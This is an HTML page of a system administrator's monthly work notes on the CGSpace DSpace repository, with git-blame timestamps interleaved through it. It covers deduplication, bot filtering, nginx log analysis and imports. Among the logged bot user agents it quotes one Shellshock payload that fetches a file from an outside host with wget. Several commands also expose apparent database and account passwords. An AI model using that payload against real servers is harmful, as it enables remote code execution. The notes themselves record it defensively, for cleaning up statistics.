2022-03-01 15:48:40 +01:00
<!DOCTYPE html>
< html lang = "en" >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, shrink-to-fit=no" >
2022-04-27 08:58:45 +02:00
< meta property = "og:title" content = "March, 2022" / >
< meta property = "og:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
2022-03-01 15:48:40 +01:00
< meta property = "og:type" content = "article" / >
< meta property = "og:url" content = "https://alanorth.github.io/cgspace-notes/2022-03/" / >
2022-04-27 08:58:45 +02:00
< meta property = "article:published_time" content = "2022-03-01T16:46:54+03:00" / >
2022-06-13 14:53:16 +02:00
< meta property = "article:modified_time" content = "2022-06-09T09:41:49+03:00" / >
2022-03-01 15:48:40 +01:00
< meta name = "twitter:card" content = "summary" / >
2022-04-27 08:58:45 +02:00
< meta name = "twitter:title" content = "March, 2022" / >
< meta name = "twitter:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
2023-03-21 14:35:41 +01:00
< meta name = "generator" content = "Hugo 0.111.3" >
2022-03-01 15:48:40 +01:00
< script type = "application/ld+json" >
{
"@context": "http://schema.org",
"@type": "BlogPosting",
2022-04-27 08:58:45 +02:00
"headline": "March, 2022",
2022-03-01 15:48:40 +01:00
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
2022-04-27 08:58:45 +02:00
"wordCount": "1836",
"datePublished": "2022-03-01T16:46:54+03:00",
2022-06-13 14:53:16 +02:00
"dateModified": "2022-06-09T09:41:49+03:00",
2022-03-01 15:48:40 +01:00
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
< / script >
< link rel = "canonical" href = "https://alanorth.github.io/cgspace-notes/2022-03/" >
2022-04-27 08:58:45 +02:00
< title > March, 2022 | CGSpace Notes< / title >
2022-03-01 15:48:40 +01:00
<!-- combined, minified CSS -->
2022-09-12 10:35:57 +02:00
< link href = "https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel = "stylesheet" integrity = "sha256-xrqAvFBmlVdkWr4F+GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin = "anonymous" >
2022-03-01 15:48:40 +01:00
<!-- minified Font Awesome for SVG icons -->
< script defer src = "https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity = "sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz+lcnA=" crossorigin = "anonymous" > < / script >
<!-- RSS 2.0 feed -->
< / head >
< body >
< div class = "blog-masthead" >
< div class = "container" >
< nav class = "nav blog-nav" >
< a class = "nav-link " href = "https://alanorth.github.io/cgspace-notes/" > Home< / a >
< / nav >
< / div >
< / div >
< header class = "blog-header" >
< div class = "container" >
< h1 class = "blog-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/" rel = "home" > CGSpace Notes< / a > < / h1 >
< p class = "lead blog-description" dir = "auto" > Documenting day-to-day work on the < a href = "https://cgspace.cgiar.org" > CGSpace< / a > repository.< / p >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div class = "col-sm-8 blog-main" >
< article class = "blog-post" >
< header >
2022-04-27 08:58:45 +02:00
< h2 class = "blog-post-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/2022-03/" > March, 2022< / a > < / h2 >
2022-03-01 15:48:40 +01:00
< p class = "blog-post-meta" >
2022-04-27 08:58:45 +02:00
< time datetime = "2022-03-01T16:46:54+03:00" > Tue Mar 01, 2022< / time >
2022-03-01 15:48:40 +01:00
in
2022-06-23 07:40:53 +02:00
< span class = "fas fa-folder" aria-hidden = "true" > < / span > < a href = "/categories/notes/" rel = "category tag" > Notes< / a >
2022-03-01 15:48:40 +01:00
< / p >
< / header >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-01" > 2022-03-01< / h2 >
< ul >
< li > Send Gaia the last batch of potential duplicates for items 701 to 980:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p < span style = "color:#e6db74" > ' fuuu' < / span > -o /tmp/2022-03-01-tac-batch4-701-980.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-04" > 2022-03-04< / h2 >
< ul >
< li > Looking over the CGSpace Solr statistics from 2022-02
2022-03-04 13:30:06 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I see a few new bots, though once I expanded my search for user agents with “ www” in the name I found so many more!< / li >
< li > Here are some of the more prevalent or weird ones:
2022-03-04 13:30:06 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > axios/0.21.1< / li >
< li > Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)< / li >
< li > Nutraspace/Nutch-1.2 (< a href = "https://www.nutraspace.com" > www.nutraspace.com< / a > )< / li >
< li > Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; < a href = "mailto:webmaster@moreover.com" > webmaster@moreover.com< / a > )< / li >
< li > Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com< / li >
< li > Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)< / li >
< li > Crowsnest/0.5 (+http://www.crowsnest.tv/)< / li >
< li > Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com< / li >
< li > metha/0.2.27< / li >
< li > ZaloPC-win32-24v454< / li >
< li > Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x< / li >
< li > ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)< / li >
< li > FullStoryBot/1.0 (+https://www.fullstory.com)< / li >
< li > Link Validity Check From: < a href = "http://www.usgs.gov" > http://www.usgs.gov< / a > < / li >
< li > OSPScraper (+https://www.opensyllabusproject.org)< / li >
< li > () { :;}; /bin/bash -c " wget -O /tmp/bbb < a href = "https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832" > www.redel.net.br/1.php?id=3137382e37392e3138372e313832< / a > " < / li >
2022-03-04 13:30:06 +01:00
< / ul >
< / li >
2022-04-27 08:58:45 +02:00
< li > I submitted < a href = "https://github.com/atmire/COUNTER-Robots/pull/52" > a pull request to COUNTER-Robots< / a > with some of these< / li >
< / ul >
< / li >
< li > I purged a bunch of hits from the stats using the < code > check-spider-hits.sh< / code > script:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > ]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
< / span > < / span > < span style = "display:flex;" > < span > Purging 6 hits from scalaj-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 5 hits from lua-resty-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 9 hits from AHC in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 7 hits from acebookexternalhit in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1011 hits from axios\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2216 hits from Faveeo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1164 hits from Moreover\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 740 hits from Exploratodo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 585 hits from GroupHigh\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 438 hits from Crowsnest\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1326 hits from nbertaupete95 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 182 hits from metha\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 68 hits from ZaloPC-win32-24v454 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1644 hits from Firefox\/x\.x in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 678 hits from ZoteroTranslationServer in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 27 hits from FullStoryBot in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from Link Validity Check in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from OSPScraper in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1 hits from 3137382e37392e3138372e313832 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2755 hits from Nutch-[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" >
< / span > < / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" > < / span > Total number of bot hits purged: 12914
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project< / li >
2022-03-04 13:30:06 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-05" > 2022-03-05< / h2 >
2022-03-05 21:14:13 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Start AReS harvest< / li >
< / ul >
< h2 id = "2022-03-10" > 2022-03-10< / h2 >
< ul >
< li > A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701– 980 in the spreadsheet)
2022-03-10 12:35:14 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I created a filter in LibreOffice and selected the IDs for items with the action “ delete” , then I created a custom text facet in OpenRefine with this GREL:< / li >
2022-03-10 12:35:14 +01:00
< / ul >
< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< pre tabindex = "0" > < code > or(
isNotNull(value.match(' 707' )),
isNotNull(value.match(' 709' )),
isNotNull(value.match(' 710' )),
isNotNull(value.match(' 711' )),
isNotNull(value.match(' 713' )),
isNotNull(value.match(' 717' )),
isNotNull(value.match(' 718' )),
...
isNotNull(value.match(' 821' ))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-10-tac-batch4-701to980.map
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-12" > 2022-03-12< / h2 >
2022-03-13 20:08:57 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Update all containers and rebuild OpenRXV on linode20:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ docker images | grep -v ^REPO | sed < span style = "color:#e6db74" > ' s/ \+/:/g' < / span > | cut -d: -f1,2 | xargs -L1 docker pull
< / span > < / span > < span style = "display:flex;" > < span > $ docker-compose build
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Then run all system updates and reboot< / li >
2022-03-13 20:08:57 +01:00
< li > Start a full harvest on AReS< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-16" > 2022-03-16< / h2 >
2022-03-16 16:32:01 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
2022-03-16 16:32:01 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing< / li >
2022-03-16 16:32:01 +01:00
< / ul >
< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-20" > 2022-03-20< / h2 >
< ul >
< li > Start a full harvest on AReS< / li >
2022-03-22 14:02:11 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-21" > 2022-03-21< / h2 >
2022-03-22 14:02:11 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Review a few submissions for Open Repositories 2022< / li >
< li > Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed< / li >
2022-03-22 14:02:11 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-22" > 2022-03-22< / h2 >
2022-03-22 14:02:11 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
2022-03-22 14:02:11 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I had been meaning to update my local database… < / li >
2022-03-22 14:02:11 +01:00
< / ul >
< / li >
2022-04-27 08:58:45 +02:00
< li > I re-imported the CGIAR CAS documents to < a href = "https://dspacetest.cgiar.org/handle/10568/118432" > DSpace Test< / a > and generated the PDF thumbnails:< / li >
2022-03-22 14:02:11 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-22-tac-700.map
< / span > < / span > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace filter-media -p < span style = "color:#e6db74" > " ImageMagick PDF Thumbnail" < / span > -i 10568/118432
2022-03-22 14:02:11 +01:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > On my local environment I decided to run the < code > check-duplicates.py< / code > script one more time with all 700 items:< / li >
2022-03-22 20:04:11 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p < span style = "color:#e6db74" > ' dom@in34sniper' < / span > -o /tmp/2022-03-22-tac-duplicates.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
2022-03-22 20:04:11 +01:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > I sent the resulting 76 items to Gaia to check< / li >
< li > UptimeRobot said that CGSpace was down
2022-03-22 20:04:11 +01:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I looked and found many locks belonging to the REST API application:< / li >
2022-03-22 20:04:11 +01:00
< / ul >
< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ psql -c < span style = "color:#e6db74" > ' SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' < / span > | grep -o -E < span style = "color:#e6db74" > ' (dspaceWeb|dspaceApi)' < / span > | sort | uniq -c | sort -n
< / span > < / span > < span style = "display:flex;" > < span > 301 dspaceWeb
< / span > < / span > < span style = "display:flex;" > < span > 2390 dspaceApi
2022-03-22 20:04:11 +01:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > Looking at nginx’ s logs, I found the top addresses making requests today:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > # awk < span style = "color:#e6db74" > ' {print $1}' < / span > /var/log/nginx/rest.log | sort | uniq -c | sort -h
< / span > < / span > < span style = "display:flex;" > < span > 1977 45.5.184.2
< / span > < / span > < span style = "display:flex;" > < span > 3167 70.32.90.172
< / span > < / span > < span style = "display:flex;" > < span > 4754 54.195.118.125
< / span > < / span > < span style = "display:flex;" > < span > 5411 205.186.128.185
< / span > < / span > < span style = "display:flex;" > < span > 6826 137.184.159.211
2022-03-22 20:04:11 +01:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > 137.184.159.211 is on DigitalOcean using this user agent: < code > GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28< / code >
< ul >
< li > I blocked this IP in nginx and the load went down immediately< / li >
< / ul >
< / li >
< li > 205.186.128.185 is on Media Temple, but it’ s OK because it’ s the CCAFS publications importer bot< / li >
< li > 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)< / li >
< li > 70.32.90.172 is on Media Temple and has no user agent< / li >
< li > What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
< ul >
< li > I verified it works as expected with an empty user agent:< / li >
< / ul >
< / li >
2022-03-25 10:17:36 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ curl -H User-Agent:< span style = "color:#e6db74" > ' ' < / span > < span style = "color:#e6db74" > ' https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all' < / span >
< / span > < / span > < span style = "display:flex;" > < span > Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word ' bot' , if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
2022-03-25 10:17:36 +01:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > I note that the nginx log shows ‘ -’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘ -’ , for example these were successful:< / li >
2022-03-25 10:17:36 +01:00
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > 70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] " GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 " -" " -"
< / span > < / span > < span style = "display:flex;" > < span > 70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] " GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 " -" " -"
2022-03-28 15:09:34 +02:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > I can only assume that these requests used a literal ‘ -’ so I will have to add an nginx rule to block those too< / li >
< li > Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that< / li >
< / ul >
< h2 id = "2022-03-24" > 2022-03-24< / h2 >
< ul >
< li > Maria from ABC asked about a reporting discrepancy on AReS
< ul >
< li > I think it’ s because the last harvest was over the weekend, and she was expecting to see items submitted this week< / li >
< / ul >
< / li >
< li > Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
< ul >
< li > She asked if we can download them and upload them directly to CGSpace< / li >
< / ul >
< / li >
< li > I re-created my local Artifactory container< / li >
< li > I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
< ul >
< li > One thing I realized is that OAI is no longer a standalone web application, it is part of the < code > server< / code > app now: http://localhost:8080/server/oai/request?verb=Identify< / li >
< / ul >
< / li >
< li > Deploy PostgreSQL 12 on CGSpace (linode18) but don’ t switch over yet, because I see some users active
< ul >
< li > I did this on DSpace Test in 2022-02 so I just followed the same procedure< / li >
< li > After that I ran all system updates and rebooted the server< / li >
< / ul >
< / li >
< / ul >
< h2 id = "2022-03-25" > 2022-03-25< / h2 >
< ul >
< li > Looking at the PostgreSQL database size on CGSpace after the update yesterday:< / li >
< / ul >
< p > < img src = "/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt = "PostgreSQL database size day" > < / p >
< ul >
< li > The space saving in indexes of recent PostgreSQL releases is awesome!< / li >
< li > Import a DSpace 6.x database dump from production into my local DSpace 7 database
< ul >
< li > I see I still the same errors < a href = "/cgspace-notes/2021-04/" > I saw in 2021-04< / a > when testing DSpace 7.0 beta 5< / li >
< li > I had to delete some old migrations, as well as all Atmire ones first:< / li >
< / ul >
< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN (' 5.0.2017.09.25' , ' 6.0.2017.01.30' , ' 6.0.2017.09.25' );
2022-06-13 14:53:16 +02:00
< / span > < / span > < span style = "display:flex;" > < span > localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE ' %Atmire%' OR description LIKE ' %CUA%' OR description LIKE ' %cua%' ;
2022-04-24 20:06:28 +02:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > Then I was able to migrate to DSpace 7 with < code > dspace database migrate ignored< / code > as the < a href = "https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace" > DSpace upgrade notes say< / a >
2022-03-29 15:01:48 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I see that the < a href = "https://github.com/DSpace/dspace-angular/issues/1357" > flash of unstyled content bug< / a > still exists on dspace-angluar… ouch!< / li >
2022-03-29 15:01:48 +02:00
< / ul >
< / li >
2022-04-27 08:58:45 +02:00
< li > Start a harvest on AReS< / li >
< / ul >
< h2 id = "2022-03-26" > 2022-03-26< / h2 >
< ul >
< li > Update dspace-statistics-api to Falcon 3.1.0 and < a href = "https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3" > release v1.4.3< / a > < / li >
2022-03-29 15:01:48 +02:00
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-28" > 2022-03-28< / h2 >
2022-03-31 15:09:14 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:< / li >
2022-03-31 15:09:14 +02:00
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p < span style = "color:#e6db74" > ' fuuuuuuuu' < / span >
2022-03-31 15:09:14 +02:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
< ul >
< li > According to my notes from < a href = "/cgspace-notes/2020-10/" > 2020-10< / a > the account must be in the admin group in order to submit via the REST API< / li >
2022-03-31 15:09:14 +02:00
< / ul >
2022-04-27 08:58:45 +02:00
< / li >
< li > Abenet and I noticed 1,735 items in CTA’ s community that have the title “ delete”
2022-03-31 15:09:14 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > We asked Peter and he said we should delete them< / li >
< li > I exported the CTA community metadata and used OpenRefine to filter all items with the “ delete” title, then used the “ expunge” bulkedit action to remove them< / li >
< / ul >
< / li >
< li > I realized I forgot to clean up the old Let’ s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
2022-04-04 18:15:58 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I also removed the pre-Ubuntu 20.04 Let’ s Encrypt stuff from the Ansble infrastructure playbooks< / li >
2022-04-04 18:15:58 +02:00
< / ul >
< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-29" > 2022-03-29< / h2 >
2022-03-31 15:09:14 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
< ul >
< li > I created a filter in LibreOffice and selected the IDs for items with the action “ delete” , then I created a custom text facet in OpenRefine with this GREL:< / li >
< / ul >
< / li >
< / ul >
< pre tabindex = "0" > < code > or(
isNotNull(value.match(' 33' )),
isNotNull(value.match(' 179' )),
isNotNull(value.match(' 452' )),
isNotNull(value.match(' 489' )),
isNotNull(value.match(' 541' )),
isNotNull(value.match(' 568' )),
isNotNull(value.match(' 646' )),
isNotNull(value.match(' 889' ))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ export JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Dfile.encoding=UTF-8 -Xmx1024m" < / span >
< / span > < / span > < span style = "display:flex;" > < span > $ dspace import --add --eperson< span style = "color:#f92672" > =< / span > umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-29-cgiar-tac.map
< / span > < / span > < span style = "display:flex;" > < span > $ chrt -b < span style = "color:#ae81ff" > 0< / span > dspace filter-media -p < span style = "color:#e6db74" > " ImageMagick PDF Thumbnail" < / span > -i 10947/50
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > After that I did some normalization on the < code > cg.subject.system< / code > metadata and extracted a few dozen countries to the country field< / li >
2022-04-24 20:06:28 +02:00
< li > Start a harvest on AReS< / li >
2022-03-31 15:09:14 +02:00
< / ul >
2022-04-27 08:58:45 +02:00
< h2 id = "2022-03-30" > 2022-03-30< / h2 >
< ul >
< li > Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p < span style = "color:#e6db74" > ' fuuuu' < / span >
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I started looking into the request regarding the CIAT Library PDFs
< ul >
< li > There are over 4,000 links to PDFs hosted on that server in CGSpace metadata< / li >
< li > The links seem to be down though! I emailed Paola to ask< / li >
< / ul >
< / li >
< / ul >
